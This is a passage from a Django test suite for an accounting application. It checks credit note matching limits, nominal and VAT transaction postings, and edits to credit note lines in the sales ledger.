vat_tran.field,
"v"
)
self.assertEqual(
vat_tran.tran_type,
header.type
)
self.assertEqual(
vat_tran.vat_type,
"o"
)
self.assertEqual(
vat_tran.vat_code,
lines[i].vat_code
)
self.assertEqual(
vat_tran.vat_rate,
lines[i].vat_code.rate
)
self.assertEqual(
vat_tran.goods,
lines[i].goods
)
self.assertEqual(
vat_tran.vat,
lines[i].vat
)
self.assertEqual(
header.goods,
sum(vat_tran.goods for vat_tran in vat_transactions)
)
self.assertEqual(
header.vat,
sum(vat_tran.vat for vat_tran in vat_transactions)
)
# CORRECT USAGE
def test_selecting_a_transaction_to_match_but_for_zero_value_against_negative_invoice_NEGATIVE(self):
self.client.force_login(self.user)
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": "sc",
"customer": self.customer.pk,
"period": self.period.pk,
"ref": self.ref,
"date": self.date,
"due_date": self.due_date,
"total": 0
}
)
data.update(header_data)
receipt = create_receipts(
self.customer, "receipt", 1, self.period, 2400)[0] # NEGATIVE PAYMENT
headers_as_dicts = [to_dict(receipt)]
headers_to_match_against = [get_fields(
header, ['type', 'ref', 'total', 'paid', 'due', 'id']) for header in headers_as_dicts]
matching_forms = []
matching_forms += add_and_replace_objects([headers_to_match_against[0]], {
"id": "matched_to"}, {"value": 0})
matching_data = create_formset_data(
match_form_prefix, matching_forms)
line_forms = ([{
'description': self.description,
'goods': -100,
'nominal': self.nominal.pk,
'vat_code': self.vat_code.pk,
'vat': -20
}]) * 20
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
data.update(matching_data)
data.update(line_data)
response = self.client.post(self.url, data)
self.assertEqual(response.status_code, 302)
headers = SaleHeader.objects.all().order_by("pk")
self.assertEqual(len(headers), 2)
receipt = headers[0]
header = headers[1]
self.assertEqual(
header.total,
-20 * (-100 + -20)
)
self.assertEqual(
header.goods,
-20 * -100
)
self.assertEqual(
header.vat,
-20 * -20
)
self.assertEqual(
header.ref,
self.ref
)
self.assertEqual(
header.paid,
0
)
self.assertEqual(
header.due,
2400
)
self.assertEqual(
receipt.total,
-2400
)
self.assertEqual(
receipt.paid,
0
)
self.assertEqual(
receipt.due,
-2400
)
nom_trans = NominalTransaction.objects.all()
self.assertEqual(
len(nom_trans),
20 + 20 + 20
# i.e. 20 nominal entries for each goods value
# 20 nominal entries for each vat value
# 20 nominal entries for each goods + vat value
)
lines = SaleLine.objects.all().order_by("pk")
self.assertEqual(
len(lines),
20
)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
20
)
for i, line in enumerate(lines):
self.assertEqual(
line.line_no,
i + 1
)
self.assertEqual(
line.description,
self.description
)
self.assertEqual(
line.goods,
100
)
self.assertEqual(
line.nominal,
self.nominal
)
self.assertEqual(
line.vat_code,
self.vat_code
)
self.assertEqual(
line.vat,
20
)
self.assertEqual(
line.goods_nominal_transaction,
nom_trans[(3 * i) + 0]
)
self.assertEqual(
line.vat_nominal_transaction,
nom_trans[(3 * i) + 1]
)
self.assertEqual(
line.total_nominal_transaction,
nom_trans[(3 * i) + 2]
)
self.assertEqual(
line.vat_transaction,
vat_transactions[i]
)
goods_trans = nom_trans[::3]
vat_trans = nom_trans[1::3]
total_trans = nom_trans[2::3]
for i, tran in enumerate(goods_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.nominal
)
self.assertEqual(
tran.value,
-100
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
'g'
)
for i, tran in enumerate(vat_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.vat_nominal
)
self.assertEqual(
tran.value,
-20
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
'v'
)
for i, tran in enumerate(total_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.sale_control
)
self.assertEqual(
tran.value,
100 + 20
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
't'
)
total = 0
for tran in nom_trans:
total = total + tran.value
self.assertEqual(
total,
0
)
matches = SaleMatching.objects.all()
self.assertEqual(
len(matches),
0
)
for i, vat_tran in enumerate(vat_transactions):
self.assertEqual(
vat_tran.header,
header.pk
)
self.assertEqual(
vat_tran.line,
lines[i].pk
)
self.assertEqual(
vat_tran.module,
"SL"
)
self.assertEqual(
vat_tran.ref,
header.ref
)
self.assertEqual(
vat_tran.period,
header.period
)
self.assertEqual(
vat_tran.date,
header.date
)
self.assertEqual(
vat_tran.field,
"v"
)
self.assertEqual(
vat_tran.tran_type,
header.type
)
self.assertEqual(
vat_tran.vat_type,
"o"
)
self.assertEqual(
vat_tran.vat_code,
lines[i].vat_code
)
self.assertEqual(
vat_tran.vat_rate,
lines[i].vat_code.rate
)
self.assertEqual(
vat_tran.goods,
lines[i].goods
)
self.assertEqual(
vat_tran.vat,
lines[i].vat
)
self.assertEqual(
header.goods,
sum(vat_tran.goods for vat_tran in vat_transactions)
)
self.assertEqual(
header.vat,
sum(vat_tran.vat for vat_tran in vat_transactions)
)
# INCORRECT USAGE
# For an invoice of 2400 the match value must be between 0 and -2400
def test_match_total_less_than_zero_NEGATIVE(self):
self.client.force_login(self.user)
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": "sc",
"customer": self.customer.pk,
"period": self.period.pk,
"ref": self.ref,
"date": self.date,
"due_date": self.due_date,
"total": 0
}
)
data.update(header_data)
invoice_to_match = create_invoices(
self.customer, "invoice to match", 1, self.period, 2000)[0]
headers_as_dicts = [to_dict(invoice_to_match)]
headers_to_match_against = [get_fields(
header, ['type', 'ref', 'total', 'paid', 'due', 'id']) for header in headers_as_dicts]
matching_forms = []
matching_forms += add_and_replace_objects([headers_to_match_against[0]], {
"id": "matched_to"}, {"value": 0.01})
matching_data = create_formset_data(
match_form_prefix, matching_forms)
line_forms = ([{
'description': self.description,
'goods': -100,
'nominal': self.nominal.pk,
'vat_code': self.vat_code.pk,
'vat': -20
}]) * 20
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
data.update(matching_data)
data.update(line_data)
response = self.client.post(self.url, data)
self.assertEqual(response.status_code, 200)
self.assertContains(
response,
'<li class="py-1">Please ensure the total of the transactions you are matching is between 0 and -2400.00</li>',
html=True
)
headers = SaleHeader.objects.all().order_by("pk")
self.assertEqual(len(headers), 1)
invoice_to_match = headers[0]
self.assertEqual(
invoice_to_match.total,
2400
)
self.assertEqual(
invoice_to_match.paid,
0
)
self.assertEqual(
invoice_to_match.due,
2400
)
nom_trans = NominalTransaction.objects.all()
self.assertEqual(
len(nom_trans),
0
# i.e. 20 nominal entries for each goods value
# 20 nominal entries for each vat value
# 20 nominal entries for each goods + vat value
)
lines = SaleLine.objects.all()
self.assertEqual(len(lines), 0)
matches = SaleMatching.objects.all()
self.assertEqual(
len(matches),
0
)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
0
)
    # INCORRECT USAGE
    # Try to match 2400.01 of a receipt against a credit note for -2400
def test_match_total_less_than_invoice_total_NEGATIVE(self):
self.client.force_login(self.user)
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": "sc",
"customer": self.customer.pk,
"period": self.period.pk,
"ref": self.ref,
"date": self.date,
"due_date": self.due_date,
"total": 0
}
)
data.update(header_data)
receipt = create_receipts(
self.customer, "invoice to match", 1, self.period, 2500)[0]
headers_as_dicts = [to_dict(receipt)]
headers_to_match_against = [get_fields(
header, ['type', 'ref', 'total', 'paid', 'due', 'id']) for header in headers_as_dicts]
matching_forms = []
matching_forms += add_and_replace_objects([headers_to_match_against[0]], {
"id": "matched_to"}, {"value": 2400.01})
matching_data = create_formset_data(
match_form_prefix, matching_forms)
line_forms = ([{
'description': self.description,
'goods': -100,
'nominal': self.nominal.pk,
'vat_code': self.vat_code.pk,
'vat': -20
}]) * 20
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
data.update(matching_data)
data.update(line_data)
response = self.client.post(self.url, data)
self.assertEqual(response.status_code, 200)
self.assertContains(
response,
'<li class="py-1">Please ensure the total of the transactions you are matching is between 0 and -2400.00</li>',
html=True
)
headers = SaleHeader.objects.all().order_by("pk")
self.assertEqual(len(headers), 1)
receipt = headers[0]
self.assertEqual(
receipt.total,
-2500
)
self.assertEqual(
receipt.paid,
0
)
self.assertEqual(
receipt.due,
-2500
)
nom_trans = NominalTransaction.objects.all()
self.assertEqual(
len(nom_trans),
0
# i.e. 20 nominal entries for each goods value
# 20 nominal entries for each vat value
# 20 nominal entries for each goods + vat value
)
lines = SaleLine.objects.all()
self.assertEqual(len(lines), 0)
matches = SaleMatching.objects.all()
self.assertEqual(
len(matches),
0
)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
0
)
# CORRECT USAGE
# We've already tested we can match the whole amount and matching 0 does not count
# Now try matching for value in between
def test_matching_a_value_but_not_whole_amount_NEGATIVE(self):
self.client.force_login(self.user)
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": "sc",
"customer": self.customer.pk,
"period": self.period.pk,
"ref": self.ref,
"date": self.date,
"due_date": self.due_date,
"total": 0
}
)
data.update(header_data)
receipt = create_receipts(self.customer, "receipt", 1, self.period, 2400)[0]
headers_as_dicts = [to_dict(receipt)]
headers_to_match_against = [get_fields(
header, ['type', 'ref', 'total', 'paid', 'due', 'id']) for header in headers_as_dicts]
matching_forms = []
matching_forms += add_and_replace_objects([headers_to_match_against[0]], {
"id": "matched_to"}, {"value": 1200})
matching_data = create_formset_data(
match_form_prefix, matching_forms)
line_forms = ([{
'description': self.description,
'goods': -100,
'nominal': self.nominal.pk,
'vat_code': self.vat_code.pk,
'vat': -20
}]) * 20
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
data.update(matching_data)
data.update(line_data)
response = self.client.post(self.url, data)
self.assertEqual(response.status_code, 302)
headers = SaleHeader.objects.all().order_by("pk")
self.assertEqual(len(headers), 2)
receipt = headers[0]
header = headers[1]
self.assertEqual(
header.total,
-20 * (-100 + -20)
)
self.assertEqual(
header.goods,
-20 * -100
)
self.assertEqual(
header.vat,
-20 * -20
)
self.assertEqual(
header.ref,
self.ref
)
self.assertEqual(
header.paid,
1200
)
self.assertEqual(
header.due,
1200
)
self.assertEqual(
receipt.total,
-2400
)
self.assertEqual(
receipt.paid,
-1200
)
self.assertEqual(
receipt.due,
-1200
)
nom_trans = NominalTransaction.objects.all()
self.assertEqual(
len(nom_trans),
20 + 20 + 20
# i.e. 20 nominal entries for each goods value
# 20 nominal entries for each vat value
# 20 nominal entries for each goods + vat value
)
lines = SaleLine.objects.all().order_by("pk")
self.assertEqual(
len(lines),
20
)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
20
)
for i, line in enumerate(lines):
self.assertEqual(
line.line_no,
i + 1
)
self.assertEqual(
line.description,
self.description
)
self.assertEqual(
line.goods,
100
)
self.assertEqual(
line.nominal,
self.nominal
)
self.assertEqual(
line.vat_code,
self.vat_code
)
self.assertEqual(
line.vat,
20
)
self.assertEqual(
line.goods_nominal_transaction,
nom_trans[(3 * i) + 0]
)
self.assertEqual(
line.vat_nominal_transaction,
nom_trans[(3 * i) + 1]
)
self.assertEqual(
line.total_nominal_transaction,
nom_trans[(3 * i) + 2]
)
self.assertEqual(
line.vat_transaction,
vat_transactions[i]
)
goods_trans = nom_trans[::3]
vat_trans = nom_trans[1::3]
total_trans = nom_trans[2::3]
for i, tran in enumerate(goods_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.nominal
)
self.assertEqual(
tran.value,
-100
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
'g'
)
for i, tran in enumerate(vat_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.vat_nominal
)
self.assertEqual(
tran.value,
-20
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
'v'
)
for i, tran in enumerate(total_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.sale_control
)
self.assertEqual(
tran.value,
100 + 20
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
't'
)
total = 0
for tran in nom_trans:
total = total + tran.value
self.assertEqual(
total,
0
)
matches = SaleMatching.objects.all()
self.assertEqual(
len(matches),
1
)
self.assertEqual(
matches[0].matched_by,
header
)
self.assertEqual(
matches[0].matched_to,
headers[0] # receipt created first before invoice
)
self.assertEqual(
matches[0].value,
-1200
)
for i, vat_tran in enumerate(vat_transactions):
self.assertEqual(
vat_tran.header,
header.pk
)
self.assertEqual(
vat_tran.line,
lines[i].pk
)
self.assertEqual(
vat_tran.module,
"SL"
)
self.assertEqual(
vat_tran.ref,
header.ref
)
self.assertEqual(
vat_tran.period,
header.period
)
self.assertEqual(
vat_tran.date,
header.date
)
self.assertEqual(
vat_tran.field,
"v"
)
self.assertEqual(
vat_tran.tran_type,
header.type
)
self.assertEqual(
vat_tran.vat_type,
"o"
)
self.assertEqual(
vat_tran.vat_code,
lines[i].vat_code
)
self.assertEqual(
vat_tran.vat_rate,
lines[i].vat_code.rate
)
self.assertEqual(
vat_tran.goods,
lines[i].goods
)
self.assertEqual(
vat_tran.vat,
lines[i].vat
)
self.assertEqual(
header.goods,
sum(vat_tran.goods for vat_tran in vat_transactions)
)
self.assertEqual(
header.vat,
sum(vat_tran.vat for vat_tran in vat_transactions)
)
class EditCreditNoteNominalEntries(TestCase):
    @classmethod
    def setUpTestData(cls):
        """
        Build the fixture shared by every test in the class: a superuser,
        a customer, an open 2020-01 period, a minimal nominal tree
        (bank, sales ledger control, vat) and a standard-rate vat code.
        """
        cls.user = get_user_model().objects.create_superuser(username="dummy", password="dummy")
        cls.factory = RequestFactory()
        cls.customer = Customer.objects.create(name="test_customer")
        cls.ref = "test matching"
        # dates formatted for posting through forms ...
        cls.date = datetime.now().strftime(DATE_INPUT_FORMAT)
        cls.due_date = (datetime.now() + timedelta(days=31)).strftime(DATE_INPUT_FORMAT)
        # ... and formatted for creating model instances directly
        cls.model_date = datetime.now().strftime(MODEL_DATE_INPUT_FORMAT)
        cls.model_due_date = (datetime.now() + timedelta(days=31)).strftime(MODEL_DATE_INPUT_FORMAT)
        fy = FinancialYear.objects.create(financial_year=2020)
        cls.period = Period.objects.create(fy=fy, period="01", fy_and_period="202001", month_start=date(2020,1,31))
        cls.description = "a line description"
        # ASSETS
        assets = Nominal.objects.create(name="Assets")
        current_assets = Nominal.objects.create(parent=assets, name="Current Assets")
        cls.nominal = Nominal.objects.create(parent=current_assets, name="Bank Account")
        cls.sale_control = Nominal.objects.create(
            parent=current_assets, name="Sales Ledger Control"
        )
        # LIABILITIES
        liabilities = Nominal.objects.create(name="Liabilities")
        current_liabilities = Nominal.objects.create(parent=liabilities, name="Current Liabilities")
        cls.vat_nominal = Nominal.objects.create(parent=current_liabilities, name="Vat")
        cls.vat_code = Vat.objects.create(code="1", name="standard rate", rate=20)
        # default posting periods for every module point at the same period
        ModuleSettings.objects.create(
            cash_book_period=cls.period,
            nominals_period=cls.period,
            purchases_period=cls.period,
            sales_period=cls.period
        )
# CORRECT USAGE
# Basic edit here in so far as we just change a line value
def test_nominals_created_for_lines_with_goods_and_vat_above_zero(self):
self.client.force_login(self.user)
create_credit_note_with_nom_entries(
{
"type": "sc",
"customer": self.customer,
"period": self.period,
"ref": self.ref,
"date": self.model_date,
"due_date": self.model_due_date,
"total": 2400,
"paid": 0,
"due": 2400,
"goods": 2000,
"vat": 400
},
[
{
'description': self.description,
'goods': 100,
'nominal': self.nominal,
'vat_code': self.vat_code,
'vat': 20
}
] * 20,
self.vat_nominal,
self.sale_control
)
headers = SaleHeader.objects.all().order_by("pk")
lines = SaleLine.objects.all().order_by("pk")
self.assertEqual(
len(lines),
20
)
create_vat_transactions(headers[0], lines)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
20
)
self.assertEqual(
len(headers),
1
)
self.assertEqual(
headers[0].total,
-2400
)
self.assertEqual(
headers[0].paid,
0
)
self.assertEqual(
headers[0].due,
-2400
)
nom_trans = NominalTransaction.objects.all()
self.assertEqual(
len(nom_trans),
20 + 20 + 20
)
nom_trans = sort_multiple(nom_trans, *[ (lambda n : n.pk, False) ])
header = headers[0]
for i, vat_tran in enumerate(vat_transactions):
self.assertEqual(
vat_tran.header,
header.pk
)
self.assertEqual(
vat_tran.line,
lines[i].pk
)
self.assertEqual(
vat_tran.module,
"SL"
)
self.assertEqual(
vat_tran.ref,
header.ref
)
self.assertEqual(
vat_tran.period,
header.period
)
self.assertEqual(
vat_tran.date,
header.date
)
self.assertEqual(
vat_tran.field,
"v"
)
self.assertEqual(
vat_tran.tran_type,
header.type
)
self.assertEqual(
vat_tran.vat_type,
"o"
)
self.assertEqual(
vat_tran.vat_code,
lines[i].vat_code
)
self.assertEqual(
vat_tran.vat_rate,
lines[i].vat_code.rate
)
self.assertEqual(
vat_tran.goods,
lines[i].goods
)
self.assertEqual(
vat_tran.vat,
lines[i].vat
)
self.assertEqual(
header.goods,
sum(vat_tran.goods for vat_tran in vat_transactions)
)
self.assertEqual(
header.vat,
sum(vat_tran.vat for vat_tran in vat_transactions)
)
for i, line in enumerate(lines):
self.assertEqual(line.line_no, i + 1)
self.assertEqual(line.header, header)
self.assertEqual(line.description, self.description)
self.assertEqual(line.goods, -100)
self.assertEqual(line.nominal, self.nominal)
self.assertEqual(line.vat_code, self.vat_code)
self.assertEqual(line.vat, -20)
self.assertEqual(
line.goods_nominal_transaction,
nom_trans[ 3 * i ]
)
self.assertEqual(
line.vat_nominal_transaction,
nom_trans[ (3 * i) + 1 ]
)
self.assertEqual(
line.total_nominal_transaction,
nom_trans[ (3 * i) + 2 ]
)
self.assertEqual(
line.vat_transaction,
vat_transactions[i]
)
goods_nom_trans = nom_trans[::3]
vat_nom_trans = nom_trans[1::3]
total_nom_trans = nom_trans[2::3]
for i, tran in enumerate(goods_nom_trans):
self.assertEqual(
tran.value,
100
)
self.assertEqual(
tran.nominal,
self.nominal
)
self.assertEqual(
tran.field,
"g"
)
self.assertEqual(
lines[i].goods_nominal_transaction,
tran
)
for i, tran in enumerate(vat_nom_trans):
self.assertEqual(
tran.value,
20
)
self.assertEqual(
tran.nominal,
self.vat_nominal
)
self.assertEqual(
tran.field,
"v"
)
self.assertEqual(
lines[i].vat_nominal_transaction,
tran
)
for i, tran in enumerate(total_nom_trans):
self.assertEqual(
tran.value,
-120
)
self.assertEqual(
tran.nominal,
self.sale_control
)
self.assertEqual(
tran.field,
"t"
)
self.assertEqual(
lines[i].total_nominal_transaction,
tran
)
matches = SaleMatching.objects.all()
self.assertEqual(
len(matches),
0
)
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": header.type,
"customer": header.customer.pk,
"period": header.period.pk,
"ref": header.ref,
"date": header.date.strftime(DATE_INPUT_FORMAT),
"due_date": header.due_date.strftime(DATE_INPUT_FORMAT),
"total": -1 * header.total - 60 # we half the goods and vat for a line
}
)
data.update(header_data)
lines_as_dicts = [ to_dict(line) for line in lines ]
line_trans = [ get_fields(line, ['id', 'description', 'goods', 'nominal', 'vat_code', 'vat']) for line in lines_as_dicts ]
line_forms = line_trans
for form in line_forms:
form["goods"] *= -1
form["vat"] *= -1
line_forms[-1]["goods"] = 50
line_forms[-1]["vat"] = 10
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
line_data["line-INITIAL_FORMS"] = 20
data.update(line_data)
matching_data = create_formset_data(match_form_prefix, [])
data.update(matching_data)
url = reverse("sales:edit", kwargs={"pk": headers[0].pk})
response = self.client.post(url, data)
headers = SaleHeader.objects.all()
self.assertEqual(len(headers), 1)
self.assertEqual(
headers[0].total,
-2340
)
self.assertEqual(
headers[0].paid,
0
)
self.assertEqual(
headers[0].due,
-2340
)
nom_trans = NominalTransaction.objects.all()
nom_trans = sort_multiple(nom_trans, *[ (lambda n : n.pk, False) ])
self.assertEqual(
len(nom_trans),
20 + 20 + 20
)
header = headers[0]
lines = (
SaleLine.objects
.select_related("vat_code")
.all()
.order_by("pk")
)
self.assertEqual(
len(lines),
20
)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
20
)
vat_transactions = list(vat_transactions)
lines = list(lines)
unedited_lines = list(lines)[:-1]
for i, line in enumerate(unedited_lines):
self.assertEqual(line.line_no, i + 1)
self.assertEqual(line.header, header)
self.assertEqual(line.description, self.description)
self.assertEqual(line.goods, -100)
self.assertEqual(line.nominal, self.nominal)
self.assertEqual(line.vat_code, self.vat_code)
self.assertEqual(line.vat, -20)
self.assertEqual(
line.goods_nominal_transaction,
nom_trans[ 3 * i ]
)
self.assertEqual(
line.vat_nominal_transaction,
nom_trans[ (3 * i) + 1 ]
)
self.assertEqual(
line.total_nominal_transaction,
nom_trans[ (3 * i) + 2 ]
)
self.assertEqual(
line.vat_transaction,
vat_transactions[i]
)
i = i + 1
edited_line = lines[-1]
self.assertEqual(edited_line.line_no, i + 1)
self.assertEqual(edited_line.header, header)
self.assertEqual(edited_line.description, self.description)
self.assertEqual(edited_line.goods, -50)
self.assertEqual(edited_line.nominal, self.nominal)
self.assertEqual(edited_line.vat_code, self.vat_code)
self.assertEqual(edited_line.vat, -10)
self.assertEqual(
edited_line.goods_nominal_transaction,
nom_trans[ 57 ]
)
self.assertEqual(
edited_line.vat_nominal_transaction,
nom_trans[ 58 ]
)
self.assertEqual(
edited_line.total_nominal_transaction,
nom_trans[ 59 ]
)
self.assertEqual(
edited_line.vat_transaction,
vat_transactions[-1]
)
goods_nom_trans = nom_trans[::3]
vat_nom_trans = nom_trans[1::3]
total_nom_trans = nom_trans[2::3]
unedited_goods_nom_trans = goods_nom_trans[:-1]
# CHECK OUR UNEDITED FIRST ARE INDEED UNEDITED
for tran in unedited_goods_nom_trans:
self.assertEqual(
tran.value,
100
)
self.assertEqual(
tran.nominal,
self.nominal
)
self.assertEqual(
tran.field,
"g"
)
unedited_vat_nom_trans = vat_nom_trans[:-1]
for tran in unedited_vat_nom_trans:
self.assertEqual(
tran.value,
20
)
self.assertEqual(
tran.nominal,
self.vat_nominal
)
self.assertEqual(
tran.field,
"v"
)
unedited_total_nom_trans = total_nom_trans[:-1]
for tran in unedited_total_nom_trans:
self.assertEqual(
tran.value,
-120
)
self.assertEqual(
tran.nominal,
self.sale_control
)
self.assertEqual(
tran.field,
"t"
)
# NOW CHECK THE EDITED
edited_goods_nom_tran = goods_nom_trans[-1]
self.assertEqual(
edited_goods_nom_tran.value,
50
)
self.assertEqual(
edited_goods_nom_tran.nominal,
self.nominal
)
self.assertEqual(
edited_goods_nom_tran.field,
"g"
)
edited_vat_nom_tran = vat_nom_trans[-1]
self.assertEqual(
edited_vat_nom_tran.value,
10
)
self.assertEqual(
edited_vat_nom_tran.nominal,
self.vat_nominal
)
self.assertEqual(
edited_vat_nom_tran.field,
"v"
)
edited_total_nom_tran = total_nom_trans[-1]
self.assertEqual(
edited_total_nom_tran.value,
-60
)
self.assertEqual(
edited_total_nom_tran.nominal,
self.sale_control
)
self.assertEqual(
edited_total_nom_tran.field,
"t"
)
matches = SaleMatching.objects.all()
self.assertEqual(
len(matches),
0
)
total = 0
for tran in nom_trans:
total = total + tran.value
self.assertEqual(
total,
0
)
for i, vat_tran in enumerate(vat_transactions):
self.assertEqual(
vat_tran.header,
header.pk
)
self.assertEqual(
vat_tran.line,
lines[i].pk
)
self.assertEqual(
vat_tran.module,
"SL"
)
self.assertEqual(
vat_tran.ref,
header.ref
)
self.assertEqual(
vat_tran.period,
header.period
)
self.assertEqual(
vat_tran.date,
header.date
)
self.assertEqual(
vat_tran.field,
"v"
)
self.assertEqual(
vat_tran.tran_type,
header.type
)
self.assertEqual(
vat_tran.vat_type,
"o"
)
self.assertEqual(
vat_tran.vat_code,
lines[i].vat_code
)
self.assertEqual(
vat_tran.vat_rate,
lines[i].vat_code.rate
)
self.assertEqual(
vat_tran.goods,
lines[i].goods
)
self.assertEqual(
vat_tran.vat,
lines[i].vat
)
self.assertEqual(
header.goods,
sum(vat_tran.goods for vat_tran in vat_transactions)
)
self.assertEqual(
header.vat,
sum(vat_tran.vat for vat_tran in vat_transactions)
)
# CORRECT USAGE
# Add another line this time
def test_nominals_created_for_new_line(self):
self.client.force_login(self.user)
create_credit_note_with_nom_entries(
{
"type": "sc",
"customer": self.customer,
"period": self.period,
"ref": self.ref,
"date": self.model_date,
"due_date": self.model_due_date,
"total": 2400,
"paid": 0,
"due": 2400,
"goods": 2000,
"vat": 400
},
[
{
'description': self.description,
'goods': 100,
'nominal': self.nominal,
'vat_code': self.vat_code,
'vat': 20
}
] * 20,
self.vat_nominal,
self.sale_control
)
headers = SaleHeader.objects.all().order_by("pk")
lines = SaleLine.objects.all().order_by("pk")
self.assertEqual(
len(lines),
20
)
create_vat_transactions(headers[0], lines)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
20
)
self.assertEqual(
len(headers),
1
)
self.assertEqual(
headers[0].total,
-2400
)
self.assertEqual(
headers[0].paid,
0
)
self.assertEqual(
headers[0].due,
-2400
)
nom_trans = NominalTransaction.objects.all()
self.assertEqual(
len(nom_trans),
20 + 20 + 20
)
nom_trans = sort_multiple(nom_trans, *[ (lambda n : n.pk, False) ])
header = headers[0]
for i, vat_tran in enumerate(vat_transactions):
self.assertEqual(
vat_tran.header,
header.pk
)
self.assertEqual(
vat_tran.line,
lines[i].pk
)
self.assertEqual(
vat_tran.module,
"SL"
)
self.assertEqual(
vat_tran.ref,
header.ref
)
self.assertEqual(
vat_tran.period,
header.period
)
self.assertEqual(
vat_tran.date,
header.date
)
self.assertEqual(
vat_tran.field,
"v"
)
self.assertEqual(
vat_tran.tran_type,
header.type
)
self.assertEqual(
vat_tran.vat_type,
"o"
)
self.assertEqual(
vat_tran.vat_code,
lines[i].vat_code
)
self.assertEqual(
vat_tran.vat_rate,
lines[i].vat_code.rate
)
self.assertEqual(
vat_tran.goods,
lines[i].goods
)
self.assertEqual(
vat_tran.vat,
lines[i].vat
)
self.assertEqual(
header.goods,
sum(vat_tran.goods for vat_tran in vat_transactions)
)
self.assertEqual(
header.vat,
sum(vat_tran.vat for vat_tran in vat_transactions)
)
for i, line in enumerate(lines):
self.assertEqual(line.header, header)
self.assertEqual(line.line_no, i + 1)
self.assertEqual(line.description, self.description)
self.assertEqual(line.goods, -100)
self.assertEqual(line.nominal, self.nominal)
self.assertEqual(line.vat_code, self.vat_code)
self.assertEqual(line.vat, -20)
self.assertEqual(
line.goods_nominal_transaction,
nom_trans[ 3 * i ]
)
self.assertEqual(
line.vat_nominal_transaction,
nom_trans[ (3 * i) + 1 ]
)
self.assertEqual(
line.total_nominal_transaction,
nom_trans[ (3 * i) + 2 ]
)
self.assertEqual(
line.vat_transaction,
vat_transactions[i]
)
goods_nom_trans = nom_trans[::3]
vat_nom_trans = nom_trans[1::3]
total_nom_trans = nom_trans[2::3]
for i, tran in enumerate(goods_nom_trans):
self.assertEqual(
tran.value,
100
)
self.assertEqual(
tran.nominal,
self.nominal
)
self.assertEqual(
tran.field,
"g"
)
self.assertEqual(
lines[i].goods_nominal_transaction,
tran
)
for i, tran in enumerate(vat_nom_trans):
self.assertEqual(
tran.value,
20
)
self.assertEqual(
tran.nominal,
self.vat_nominal
)
self.assertEqual(
tran.field,
"v"
)
self.assertEqual(
lines[i].vat_nominal_transaction,
tran
)
for i, tran in enumerate(total_nom_trans):
self.assertEqual(
tran.value,
-120
)
self.assertEqual(
tran.nominal,
self.sale_control
)
self.assertEqual(
tran.field,
"t"
)
self.assertEqual(
lines[i].total_nominal_transaction,
tran
)
matches = SaleMatching.objects.all()
self.assertEqual(
len(matches),
0
)
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": header.type,
"customer": header.customer.pk,
"period": header.period.pk,
"ref": header.ref,
"date": header.date.strftime(DATE_INPUT_FORMAT),
"due_date": header.due_date.strftime(DATE_INPUT_FORMAT),
"total": (-1 * header.total) + 120
}
)
data.update(header_data)
lines_as_dicts = [ to_dict(line) for line in lines ]
line_trans = [ get_fields(line, ['id', 'description', 'goods', 'nominal', 'vat_code', 'vat']) for line in lines_as_dicts ]
line_forms = line_trans
last_line_form = line_forms[-1].copy()
last_line_form["id"] = ""
line_forms.append(last_line_form)
for form in line_forms:
form["goods"] *= -1
form["vat"] *= -1
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
